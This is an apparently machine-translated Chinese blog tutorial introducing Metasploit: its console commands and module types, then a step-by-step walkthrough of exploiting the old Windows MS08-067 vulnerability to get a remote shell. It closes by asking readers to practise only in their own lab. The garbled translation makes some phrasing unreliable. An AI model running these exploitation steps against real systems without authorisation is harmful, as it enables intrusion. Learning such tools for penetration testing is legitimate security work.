Blogger's nickname ： Stair hopping Penguin
Blogger homepage link ：https://blog.csdn.net/weixin_50481708?spm=1000.2115.3001.5343
The original intention of creation ： The original intention of this blog is to communicate with technical friends , Everyone's technology has shortcomings , Bloggers are the same , Ask for advice modestly , I hope all technical friends can give me guidance
Blogger's motto ： Find light , Follow the light , Become light , Diffuse luminescence
Bloggers' research interests ： Penetration test 、 machine learning
Blogger's message ： Thank you for your support , Your support is my driving force

One 、 First time to know MSF

1.MSF What is it?

MSF It's a kail A built-in vulnerability framework , Integrated near 3000 A means of attack , Basically, I can use this tool , Can be regarded as a bully in the intranet , Of course, with the continuous improvement of security , The requirements for infiltrators are getting higher and higher , Therefore, stronger technology and more comprehensive knowledge are needed to support penetration testers .

2.MSF Directory structure

Picture source address

3. Basic commands

Let me introduce some common commands （ Attached screenshot ）

？ command ------ In the help menu

search command ------ Search for

use command ------ Using modules

back command ------ The current environment returns

exit command ------- sign out

version command ------ View version

4. modular

（1） Attack module （exploits）

exploits To attack , Here we use a screenshot to explain ：

Order rules ：
RHOST： The target host IP Address
RPORT： Target host connection port
Payload： Payload , Return to... After success shell
LHOST： Of the attacker IP Address
LPORT： Attacker's port

（2） Building blocks （payload）

perform show options Command to configure the required naming rules
Now we can see RHOSTS Show yes, Instructions are required , But the front is empty , At this time, we need to construct it

（3） Information collection module （Auxiliary）

Intelligence gathering stage , This stage is mainly to collect as much information as possible . It's mainly used here Msf in auxiliary Inside Modules, there Modules They are all auxiliary tools in the early stage of penetration . General information collection can be used Whois( This is Linux Self contained ),db_nmap( This is Msf A plug-in for ), If you want to use other methods of collecting information , For example, use Syn( A scanning device that does not establish a head skin connection ) scanning , Can be in Msfconsole inside Search syn Then determine which module to use according to the returned results .

Two 、 First time to know MS08-067

1.MS08-067 What is it?

MS08-067 The vulnerability will affect except Windows Server 2008 Core All but Windows System , Include ：Windows 2000/XP/Server 2003/Vista/Server 2008 Each version of , Even in the test phase Windows 7 Pro-Beta.
This security update addresses a secret reporting vulnerability in the server service . If the user receives a special RPC request , The vulnerability may allow remote code execution . stay Microsoft Windows 2000、Windows XP and Windows Server 2003 On the system , An attacker may be able to use this vulnerability to run arbitrary code without authentication . This vulnerability may be used for worm attacks . Firewall best practices and standard default firewall configurations help protect network resources from attacks from outside the enterprise . You can install this Microsoft Update the program to protect your computer from intrusions . After installation , You may have to restart your computer .

2.MS08-067 Use ideas

First, we use msf This tool attempts to construct commands for intranet penetration , Let's put it in principle ,
stay windows server 2008 The system acts as a target , It can be attacked directly , Recurrence should not be a problem

3、 ... and 、 Practical explanation

1. The purpose of actual combat

（1） master MSF The basic usage of
（2） understand MS08-067 Loophole principle

2. The actual battle begins

（1） Search module

 command ：search MS08-067

（2） Using modules

 command ：use 0

（3） View module usage rules

 command ：show options

We can see here rhosts Need configuration .

（4） The attacked host ip

（5） Let's start configuring

 command ：set rhosts+ip

（6） Start the attack

 command ：run

（7） Validation vulnerabilities getshell

So we enter the command interface of the system , You can perform the operation you want .

Four 、 Practical experience

I feel a little msf The vulnerability can completely ignore the existence of the firewall , Also see the vulnerability of the system in the old version , Fortunately, the latest system vulnerabilities will be repaired in time , I hope you can learn msf Don't try maliciously , Or do you want to set up your own environment for experimental testing .